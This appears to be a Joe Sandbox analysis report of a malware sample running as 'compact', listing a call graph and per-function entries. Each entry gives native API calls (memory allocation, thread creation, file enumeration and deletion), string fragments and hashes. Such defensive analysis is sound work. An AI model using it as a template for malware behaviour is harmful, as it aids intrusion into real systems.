95397->95393 95398 2e2f4b0 95397->95398 95399 2e3a290 RtlAllocateHeap 95398->95399 95400 2e2f4d9 95399->95400 95401 2e2f4e2 95400->95401 95402 2e2f4f8 95400->95402 95404 2e382e0 NtClose 95401->95404 95439 2e2ef30 CoInitialize 95402->95439 95406 2e2f4ec 95404->95406 95405 2e2f506 95441 2e37de0 95405->95441 95408 2e2f582 95445 2e382e0 95408->95445 95410 2e2f58c 95411 2e3a1b0 RtlFreeHeap 95410->95411 95411->95390 95412 2e2f524 95412->95408 95413 2e37de0 LdrInitializeThunk 95412->95413 95413->95412 95415 2e262c3 95414->95415 95416 2e262e7 95415->95416 95448 2e37e80 95415->95448 95416->95387 95418 2e2630a 95418->95416 95419 2e382e0 NtClose 95418->95419 95420 2e2638c 95419->95420 95420->95387 95422 2e263c5 95421->95422 95453 2e37c90 95422->95453 95425 2e360b0 95426 2e3610d 95425->95426 95427 2e36140 95426->95427 95458 2e2fe44 RtlFreeHeap 95426->95458 95427->95392 95429 2e36122 95429->95392 95431 2e2f05c 95430->95431 95459 2e24770 95431->95459 95433 2e2f083 95433->95397 95434 2e2f07a 95434->95433 95435 2e24770 LdrLoadDll 95434->95435 95436 2e2f14e 95435->95436 95437 2e24770 LdrLoadDll 95436->95437 95438 2e2f1ab 95436->95438 95437->95438 95438->95397 95440 2e2ef95 95439->95440 95440->95405 95442 2e37dfa 95441->95442 95463 3602ba0 LdrInitializeThunk 95442->95463 95443 2e37e27 95443->95412 95446 2e382fa 95445->95446 95447 2e38308 NtClose 95446->95447 95447->95410 95449 2e37e9d 95448->95449 95452 3602ca0 LdrInitializeThunk 95449->95452 95450 2e37ec6 95450->95418 95452->95450 95454 2e37cad 95453->95454 95457 3602c60 LdrInitializeThunk 95454->95457 95455 2e26439 95455->95390 95455->95425 95457->95455 95458->95429 95460 2e24794 95459->95460 95461 2e247d0 LdrLoadDll 95460->95461 95462 2e2479b 95460->95462 95461->95462 95462->95434 95463->95443 95464 2e25a20 95465 2e27e40 LdrInitializeThunk 95464->95465 95466 2e25a50 95465->95466 95468 2e25a7c 95466->95468 95469 2e27dc0 95466->95469 95470 2e27dd9 95469->95470 95471 2e27e25 95470->95471 95476 2e376b0 95470->95476 95471->95466 95473 2e27e15 95474 2e27e31 95473->95474 95475 2e382e0 NtClose 95473->95475 95474->95466 95475->95471 95477 2e3771f 95476->95477 95478 2e376d1 95476->95478 95481 3604650 LdrInitializeThunk 95477->95481 95478->95473 95479 2e37741 95479->95473 95481->95479 95482 2e2a9e0 95487 2e2a710 95482->95487 95484 2e2a9ed 95501 2e2a3b0 95484->95501 95486 2e2aa09 95488 2e2a735 95487->95488 95512 2e28090 95488->95512 95491 2e2a872 95491->95484 95493 2e2a889 95493->95484 95494 2e2a880 95494->95493 95496 2e2a971 95494->95496 95527 2e29e10 95494->95527 95497 2e2a9c9 95496->95497 95536 2e2a170 95496->95536 95499 2e3a1b0 RtlFreeHeap 95497->95499 95500 2e2a9d0 95499->95500 95500->95484 95502 2e2a3c6 95501->95502 95505 2e2a3d1 95501->95505 95503 2e3a290 RtlAllocateHeap 95502->95503 95503->95505 95504 2e2a3e7 95504->95486 95505->95504 95506 2e28090 GetFileAttributesW 95505->95506 95507 2e2a6de 95505->95507 95510 2e29e10 RtlFreeHeap 95505->95510 95511 2e2a170 RtlFreeHeap 95505->95511 95506->95505 95508 2e2a6f7 95507->95508 95509 2e3a1b0 RtlFreeHeap 95507->95509 95508->95486 95509->95508 95510->95505 95511->95505 95513 2e280b1 95512->95513 95514 2e280b8 GetFileAttributesW 95513->95514 95515 2e280c3 95513->95515 95514->95515 95515->95491 95516 2e32790 95515->95516 95517 2e3279e 95516->95517 95518 2e327a5 95516->95518 95517->95494 95519 2e24770 LdrLoadDll 95518->95519 95520 2e327da 95519->95520 95521 2e327e9 95520->95521 95540 2e32260 LdrLoadDll 95520->95540 95523 2e3a290 RtlAllocateHeap 95521->95523 95526 2e32984 95521->95526 95525 2e32802 95523->95525 95524 2e3a1b0 RtlFreeHeap 95524->95526 95525->95524 95525->95526 95526->95494 95528 2e29e36 95527->95528 95541 2e2d640 95528->95541 95530 2e29e9d 95532 2e2a020 95530->95532 95533 2e29ebb 95530->95533 95531 2e2a005 95531->95494 95532->95531 95534 2e29cd0 RtlFreeHeap 95532->95534 95533->95531 95546 2e29cd0 95533->95546 95534->95532 95537 2e2a196 95536->95537 95538 2e2d640 RtlFreeHeap 95537->95538 95539 2e2a212 95538->95539 95539->95496 95540->95521 95543 2e2d656 95541->95543 95542 2e2d663 95542->95530 95543->95542 95544 2e3a1b0 RtlFreeHeap 95543->95544 95545 2e2d69c 95544->95545 95545->95530 95547 2e29ce6 95546->95547 95550 2e2d6b0 95547->95550 95549 2e29dec 95549->95533 95551 2e2d6d4 95550->95551 95552 2e2d76c 95551->95552 95553 2e3a1b0 RtlFreeHeap 95551->95553 95552->95549 95553->95552 95554 2e20da0 95555 2e20db9 95554->95555 95556 2e24770 LdrLoadDll 95555->95556 95557 2e20dd7 95556->95557 95558 2e20e23 95557->95558 95559 2e20e10 PostThreadMessageW 95557->95559 95559->95558 95560 2e35320 95561 2e3537a 95560->95561 95563 2e35387 95561->95563 95564 2e32ea0 95561->95564 95571 2e3a120 95564->95571 95566 2e32fe6 95566->95563 95567 2e32ede 95567->95566 95568 2e24770 LdrLoadDll 95567->95568 95570 2e32f24 95568->95570 95569 2e32f60 Sleep 95569->95570 95570->95566 95570->95569 95574 2e38430 95571->95574 95573 2e3a151 95573->95567 95575 2e384b4 95574->95575 95577 2e3844e 95574->95577 95576 2e384c7 NtAllocateVirtualMemory 95575->95576 95576->95573 95577->95573 95578 2e2c2a8 95579 2e2c28f FindNextFileW 95578->95579 95580 2e2c296 FindClose 95579->95580 95582 2e2c261 95579->95582 95581 2e2c29d 95580->95581 95582->95579 95584 2e2c170 95586 2e2c199 95584->95586 95585 2e2c29d 95586->95585 95587 2e2c243 FindFirstFileW 95586->95587 95587->95585 95588 2e2c25e 95587->95588 95589 2e2c28f FindNextFileW 95588->95589 95589->95588 95590 2e2c296 FindClose 95589->95590 95590->95585 95591 2e3b2f0 95592 2e3a1b0 RtlFreeHeap 95591->95592 95593 2e3b305 95592->95593 95594 2e377f0 95595 2e37871 95594->95595 95596 2e37811 95594->95596 95599 3602ee0 LdrInitializeThunk 95595->95599 95597 2e3789f 95599->95597 95600 2e38170 95601 2e38206 95600->95601 95603 2e3818e 95600->95603 95602 2e38219 NtReadFile 95601->95602 95604 2e31130 95605 2e3114c 95604->95605 95606 2e31174 95605->95606 95607 2e31188 95605->95607 95609 2e382e0 NtClose 95606->95609 95608 2e382e0 NtClose 95607->95608 95610 2e31191 95608->95610 95611 2e3117d 95609->95611 95614 2e3a2d0 RtlAllocateHeap 95610->95614 95613 2e3119c 95614->95613 95615 2e298fb 95616 2e2990a 95615->95616 95617 2e29911 95616->95617 95618 2e3a1b0 RtlFreeHeap 95616->95618 95618->95617 95619 2e1b780 95620 2e3a120 NtAllocateVirtualMemory 95619->95620 95621 2e1cdf1 95620->95621 95622 2e2fb40 95623 2e2fb5d 95622->95623 95624 2e24770 LdrLoadDll 95623->95624 95625 2e2fb7b 95624->95625 95626 2e360b0 RtlFreeHeap 95625->95626 95627 2e2fcfa 95625->95627 95626->95627 95628 2e26d40 95629 2e26d6a 95628->95629 95632 2e27c70 95629->95632 95631 2e26d8b 95633 2e27c8d 95632->95633 95639 2e37a90 95633->95639 95635 2e27cdd 95636 2e27ce4 95635->95636 95637 2e37b60 LdrInitializeThunk 95635->95637 95636->95631 95638 2e27d0d 95637->95638 95638->95631 95640 2e37b1a 95639->95640 95641 2e37aae 95639->95641 95644 3602f30 LdrInitializeThunk 95640->95644 95641->95635 95642 2e37b50 95642->95635 95644->95642 95645 2e314c0 95646 2e314cf 95645->95646 95647 2e31516 95646->95647 95650 2e31554 95646->95650 95652 2e31559 95646->95652 95648 2e3a1b0 RtlFreeHeap 95647->95648 95649 2e31526 95648->95649 95651 2e3a1b0 RtlFreeHeap 95650->95651 95651->95652 95658 2e25b49 95659 2e25ad4 95658->95659 95660 2e25b4e 95658->95660 95661 2e25ae6 95659->95661 95662 2e379a0 LdrInitializeThunk 95659->95662 95665 2e38370 95661->95665 95662->95661 95664 2e25afb 95666 2e383ee 95665->95666 95667 2e3838e 95665->95667 95670 3602e80 LdrInitializeThunk 95666->95670 95667->95664 95668 2e3841c 95668->95664 95670->95668 95671 3602ad0 LdrInitializeThunk 95672 2e19690 95673 2e1969f 95672->95673 95674 2e196e0 95673->95674 95675 2e196cd CreateThread 95673->95675 95676 2e196ff 95675->95676 95677 2e1a256 95676->95677 95679 2e39e40 95676->95679 95680 2e39e66 95679->95680 95685 2e13ff0 95680->95685 95682 2e39ea0 95682->95677 95683 2e39e72 95683->95682 95688 2e34960 95683->95688 95692 2e234a0 95685->95692 95687 2e13ffd 95687->95683 95689 2e349ba 95688->95689 95691 2e349c7 95689->95691 95728 2e21960 95689->95728 95691->95682 95694 2e234b7 95692->95694 95693 2e234cd 95693->95687 95694->95693 95699 2e38d20 95694->95699 95696 2e2351b 95696->95693 95706 2e35020 95696->95706 95698 2e23541 95698->95687 95701 2e38d38 95699->95701 95700 2e38d5c 95700->95696 95701->95700 95702 2e379a0 LdrInitializeThunk 95701->95702 95703 2e38dae 95702->95703 95704 2e3a1b0 RtlFreeHeap 95703->95704 95705 2e38dc7 95704->95705 95705->95696 95707 2e3507d 95706->95707 95708 2e350a8 95707->95708 95711 2e23120 95707->95711 95708->95698 95710 2e3508a 95710->95698 95712 2e23092 95711->95712 95712->95711 95713 2e23283 95712->95713 95717 2e27ac0 95712->95717 95713->95710 95716 2e382e0 NtClose 95716->95713 95718 2e233ac 95717->95718 95719 2e27ada 95717->95719 95718->95713 95718->95716 95723 2e37a40 95719->95723 95722 2e382e0 NtClose 95722->95718 95724 2e37a5d 95723->95724 95727 36035c0 LdrInitializeThunk 95724->95727 95725 2e27baa 95725->95722 95727->95725 95729 2e2199b 95728->95729 95744 2e27bd0 95729->95744 95731 2e21c68 95731->95691 95732 2e219a3 95732->95731 95733 2e3a290 RtlAllocateHeap 95732->95733 95734 2e219b9 95733->95734 95735 2e3a290 RtlAllocateHeap 95734->95735 95736 2e219ca 95735->95736 95737 2e3a290 RtlAllocateHeap 95736->95737 95739 2e219d8 95737->95739 95743 2e21a6b 95739->95743 95759 2e269f0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95739->95759 95740 2e24770 LdrLoadDll 95741 2e21c25 95740->95741 95755 2e37080 95741->95755 95743->95740 95745 2e27bfc 95744->95745 95746 2e27ac0 2 API calls 95745->95746 95747 2e27c1f 95746->95747 95748 2e27c41 95747->95748 95749 2e27c29 95747->95749 95751 2e27c5d 95748->95751 95753 2e382e0 NtClose 95748->95753 95750 2e27c34 95749->95750 95752 2e382e0 NtClose 95749->95752 95750->95732 95751->95732 95752->95750 95754 2e27c53 95753->95754 95754->95732 95756 2e370da 95755->95756 95758 2e370e7 95756->95758 95760 2e21c80 95756->95760 95758->95731 95759->95743 95776 2e27ea0 95760->95776 95762 2e21ca0 95763 2e22175 95762->95763 95780 2e30b00 95762->95780 95763->95758 95766 2e21ea1 95767 2e3b3c0 2 API calls 95766->95767 95770 2e21eb6 95767->95770 95768 2e21cfe 95768->95763 95783 2e3b290 95768->95783 95769 2e27e40 LdrInitializeThunk 95772 2e21ee1 95769->95772 95770->95772 95788 2e20920 95770->95788 95772->95763 95772->95769 95773 2e20920 LdrInitializeThunk 95772->95773 95773->95772 95774 2e27e40 LdrInitializeThunk 95775 2e2200f 95774->95775 95775->95772 95775->95774 95777 2e27ead 95776->95777 95778 2e27ed5 95777->95778 95779 2e27ece SetErrorMode 95777->95779 95778->95762 95779->95778 95781 2e3a120 NtAllocateVirtualMemory 95780->95781 95782 2e30b21 95781->95782 95782->95768 95784 2e3b2a0 95783->95784 95785 2e3b2a6 95783->95785 95784->95766 95786 2e3a290 RtlAllocateHeap 95785->95786 95787 2e3b2cc 95786->95787 95787->95766 95789 2e2093d 95788->95789 95792 2e38540 95789->95792 95793 2e3855a 95792->95793 95796 3602c70 LdrInitializeThunk 95793->95796 95794 2e20942 95794->95775 95796->95794 95797 2e27110 95798 2e27129 95797->95798 95806 2e2717c 95797->95806 95800 2e382e0 NtClose 95798->95800 95798->95806 95799 2e272a5 95801 2e27144 95800->95801 95807 2e26520 NtClose LdrInitializeThunk LdrInitializeThunk 95801->95807 95803 2e2727f 95803->95799 95809 2e266f0 NtClose LdrInitializeThunk LdrInitializeThunk 95803->95809 95806->95799 95808 2e26520 NtClose LdrInitializeThunk LdrInitializeThunk 95806->95808 95807->95806 95808->95803 95809->95799 95810 2e38250 95811 2e382b9 95810->95811 95813 2e38271 95810->95813 95812 2e382cc NtDeleteFile 95811->95812 95819 2e38010 95820 2e380b6 95819->95820 95821 2e38032 95819->95821 95822 2e380c9 NtCreateFile 95820->95822 95823 2e37950 95824 2e3796d 95823->95824 95827 3602df0 LdrInitializeThunk 95824->95827 95825 2e37992 95827->95825 95833 2e22a17 95834 2e22a38 95833->95834 95835 2e26290 2 API calls 95834->95835 95836 2e22a43 95835->95836 95837 2e27358 95838 2e27349 95837->95838 95841 2e2735b 95837->95841 95839 2e2aee0 9 API calls 95838->95839 95840 2e2734f 95839->95840 95842 2e2851e 95843 2e28523 95842->95843 95844 2e284e2 95843->95844 95846 2e26f60 LdrInitializeThunk LdrInitializeThunk 95843->95846 95846->95844

                                                        Executed Functions

                                                        Function 02E196F0 Relevance: 54.3, Strings: 43, Instructions: 579COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 165 2e196f0-2e19bc0 167 2e19bca-2e19bd4 165->167 168 2e19bd6-2e19bf5 167->168 169 2e19c08-2e19c12 167->169 171 2e19bf7-2e19c00 168->171 172 2e19c06 168->172 170 2e19c23-2e19c2f 169->170 173 2e19c31-2e19c3d 170->173 174 2e19c4d-2e19c54 170->174 171->172 172->167 175 2e19c4b 173->175 176 2e19c3f-2e19c45 173->176 177 2e19c86-2e19c8d 174->177 178 2e19c56-2e19c84 174->178 175->170 176->175 180 2e19cb2-2e19cb6 177->180 181 2e19c8f-2e19ca5 177->181 178->174 182 2e19d00-2e19d07 180->182 183 2e19cb8-2e19cc0 180->183 184 2e19cb0 181->184 185 2e19ca7-2e19cad 181->185 188 2e19d39-2e19d56 182->188 189 2e19d09-2e19d37 182->189 186 2e19cc2-2e19cc6 183->186 187 2e19cc7-2e19cd9 183->187 184->177 185->184 186->187 190 2e19ce0-2e19ce2 187->190 191 2e19cdb-2e19cdf 187->191 192 2e19d67-2e19d70 188->192 189->182 193 2e19cf0-2e19cfe 190->193 194 2e19ce4-2e19ced 190->194 191->190 195 2e19d72-2e19d84 192->195 196 2e19d86-2e19d90 192->196 193->180 194->193 195->192 198 2e19d92-2e19d9d 196->198 199 2e19dca-2e19ddb 196->199 201 2e19da4-2e19da6 198->201 202 2e19d9f-2e19da3 198->202 200 2e19dec-2e19df5 199->200 205 2e19df7-2e19e09 200->205 206 2e19e0b 200->206 203 2e19db9-2e19dc2 201->203 204 2e19da8-2e19db7 201->204 202->201 207 2e19dc8 203->207 204->207 205->200 209 2e19e12-2e19e19 206->209 207->196 210 2e19e1b-2e19e48 209->210 211 2e19e4a 209->211 210->209 212 2e19e51-2e19e5a 211->212 213 2e19e60-2e19e6a 212->213 214 2e1a0da-2e1a0e1 212->214 217 2e19e7b-2e19e87 213->217 215 2e1a0e7-2e1a0f1 214->215 216 2e1a256-2e1a260 214->216 221 2e1a102-2e1a10b 215->221 220 2e1a271-2e1a27d 216->220 218 2e19e89-2e19e99 217->218 219 2e19eac-2e19eb5 217->219 222 2e19e9b-2e19ea4 218->222 223 2e19eaa 218->223 226 2e19eb7-2e19ed8 219->226 227 2e19eda-2e19ee1 219->227 224 2e1a295-2e1a29f 220->224 225 2e1a27f-2e1a288 220->225 228 2e1a121-2e1a12b 221->228 229 2e1a10d-2e1a11f 221->229 222->223 223->217 235 2e1a2b0-2e1a2b9 224->235 231 2e1a293 225->231 232 2e1a28a-2e1a290 225->232 226->219 233 2e19f03-2e19f06 227->233 234 2e19ee3-2e19f01 227->234 237 2e1a13c-2e1a148 228->237 229->221 231->220 232->231 239 2e19f0c-2e19f10 233->239 234->227 240 2e1a2bb-2e1a2ca 235->240 241 2e1a2cc-2e1a2d6 235->241 242 2e1a14a-2e1a15c 237->242 243 2e1a15e-2e1a165 237->243 244 2e19f12-2e19f37 239->244 245 2e19f39-2e19f43 239->245 240->235 247 2e1a2e7-2e1a2f3 241->247 242->237 249 2e1a167-2e1a19a 243->249 250 2e1a19c-2e1a1a6 243->250 244->239 251 2e19f54-2e19f60 245->251 252 2e1a2f5-2e1a308 247->252 253 2e1a30a-2e1a314 247->253 249->243 254 2e1a1b7-2e1a1c3 250->254 257 2e19f62-2e19f74 251->257 258 2e19f76-2e19f85 251->258 252->247 255 2e1a1c5-2e1a1ce 254->255 256 2e1a1ea-2e1a1f3 254->256 260 2e1a1d0-2e1a1d4 255->260 261 2e1a1d5-2e1a1d7 255->261 262 2e1a1f5-2e1a20d 256->262 263 2e1a20f-2e1a219 256->263 257->251 265 2e19f8b-2e19f95 258->265 266 2e1a00f-2e1a019 258->266 260->261 269 2e1a1d9-2e1a1e2 261->269 270 2e1a1e8 261->270 262->256 271 2e1a22a-2e1a233 263->271 267 2e19f97-2e19fb1 265->267 268 2e19fcd-2e19fd7 265->268 272 2e1a02a-2e1a034 266->272 273 2e19fb3-2e19fb7 267->273 274 2e19fb8-2e19fba 267->274 275 2e19fe8-2e19ff4 268->275 269->270 270->254 277 2e1a251 call 2e39e40 271->277 278 2e1a235-2e1a241 271->278 279 2e1a036-2e1a08c 272->279 280 2e1a08e-2e1a0a2 272->280 273->274 281 2e19fcb 274->281 282 2e19fbc-2e19fc5 274->282 283 2e19ff6-2e1a008 275->283 284 2e1a00a 275->284 277->216 285 2e1a243-2e1a249 278->285 286 2e1a24f 278->286 279->272 289 2e1a0b3-2e1a0bf 280->289 281->265 282->281 283->275 284->214 285->286 293 2e1a21b-2e1a224 286->293 290 2e1a0c1-2e1a0d3 289->290 291 2e1a0d5 289->291 290->289 291->212 293->271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ![$&$($1$67$9$:$:$;q$=q$A$A$BM$Be$C$E&$J$JN\$K.$N$O$Q$Q$Qz$R$V~E&$X$Y$Z$\$b$d$f$j$m`$u$uC$uP$y9$0$^$l$}y9
                                                        • API String ID: 0-1953769178
                                                        • Opcode ID: 4ebefbb8747a988fb84de7d0dcee1f122221d888a120628e592b8ed0e73bf363
                                                        • Instruction ID: 1c343988351eb6e53eb5ebfc40b99ecb421ab873ac68aa8f42f6da3c010bd54d
                                                        • Opcode Fuzzy Hash: 4ebefbb8747a988fb84de7d0dcee1f122221d888a120628e592b8ed0e73bf363
                                                        • Instruction Fuzzy Hash: BB62C2B0D4522ACBEB28CF44C994BEDBBB2BB45308F1091E9C51D6B381D7B95A85CF44
                                                        Function 02E2C170 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E2C254
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02E2C28F
                                                        • FindClose.KERNELBASE(?), ref: 02E2C29A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                        • Instruction ID: 5f77e8992caeb80fd6036156f29e6183251255797f249b45af47c73a91dae457
                                                        • Opcode Fuzzy Hash: 21694489ce0a3650d5eaaae87c9f93644fc126f3e044ba9d29fa2387bb1c1b49
                                                        • Instruction Fuzzy Hash: FC3187729402187BDB21DBA0CC45FEF777DEF44B09F249559B90DA7180EB70AA848BA0
                                                        Function 02E38010 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(?,?,?,?,00000036,?,?,?,?,?,?), ref: 02E380FA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                        • Instruction ID: e56b24b50e1e98dec5391d5ce7a05c5d686916caee55c12e8bffbd63d18c3878
                                                        • Opcode Fuzzy Hash: 079124ef3477967559f5727808a8982cd5504fe3d61613fd0eea355095ec3f31
                                                        • Instruction Fuzzy Hash: 8F31D2B5A00208AFDB14DF99D881EDEB7B9EF8C704F108219F919A7340D770A851CFA4
                                                        Function 02E38170 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(?,?,?,?,00000036,?,?,?,?), ref: 02E38242
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                        • Instruction ID: b1f6d5ab3c7609415755b2c6e49d4a0819e84b00bff73b234f87b0dda3f39cae
                                                        • Opcode Fuzzy Hash: 62d9692a72f8b1308e095212dea9c2c55fc95751e8724d1e63c09cc4a6b2651c
                                                        • Instruction Fuzzy Hash: E031C8B5A40608AFDB14DF99D881EEEB7B9EF88714F108219F919A7240D770A911CFA1
                                                        Function 02E38430 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(02E21CFE,?,02E370E7,00000000,00000004,00003000,?,?,?,?,?,02E370E7,02E21CFE,02E370E7,50FFFD9F,02E21CFE), ref: 02E384E4
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                        • Instruction ID: f3f2ff1ef44e2e61955152b43d2b6f75352eaca5a1e3d646d61639b28d51f2c1
                                                        • Opcode Fuzzy Hash: fb478c230df1748140ca80267227f12761ee9c0927a232a7eff3a1499e660764
                                                        • Instruction Fuzzy Hash: 772107B5A40208AFDB24DF99DC41EEFB7B9EF88700F008119F919A7280D774A811CBA1
                                                        Function 02E38250 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                        • Instruction ID: 9e47b26466dae980f7ebd666466775c4d9d36f391385d5434b4eb286342c97cb
                                                        • Opcode Fuzzy Hash: e46a643d9d9823aea0ae1bd062fa72092a5539ba38b6ab707a48acb0fb379cff
                                                        • Instruction Fuzzy Hash: 6001ADB1A41204BBE620EAA4DC05FEB77ADEB84710F008119FA09AB280D7B47900CBE5
                                                        Function 02E382E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(?,02E233AC,001F0001,?,00000000,?,?,00000104), ref: 02E38311
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2e10000_compact.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction ID: 6e80a10f318429b107a6f38a7e966304d9710cb4b0e029b44dc6d54a87056ec9
                                                        • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction Fuzzy Hash: E8E046362402147BC620BA5ADC42FDB776DDBC5724F408015FA09AB241C771B9188AE0
                                                        Function 03604340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f80bbb1f456e02d688cb13769b14cd8e0c476a3c7330c29c948fc58b85fd995
                                                        • Instruction ID: 1442b43e1168d8bd35d05a73656ca0f11edbbdf41444c2068b19d55d85cadee4
                                                        • Opcode Fuzzy Hash: 8f80bbb1f456e02d688cb13769b14cd8e0c476a3c7330c29c948fc58b85fd995
                                                        • Instruction Fuzzy Hash: 4C900231645804139140B5584884546500597E1301B59C011E0424654D8B548A665361
                                                        Function 03604650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c13824a892047ede5b8296d754e4c99f581f26aaee2efe818d8b3d458be03313
                                                        • Instruction ID: 8c072896ad8e951ec5901f8929fdb39c0d42bcda4e9e22f4452cb65c805b81b8
                                                        • Opcode Fuzzy Hash: c13824a892047ede5b8296d754e4c99f581f26aaee2efe818d8b3d458be03313
                                                        • Instruction Fuzzy Hash: A1900261641504434140B5584804406700597E2301399C115A0554660D875889659269
                                                        Function 03602B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 055ab088e431d28e3542a639332d7435569a756726e9b7873cdf60f1c00aab97
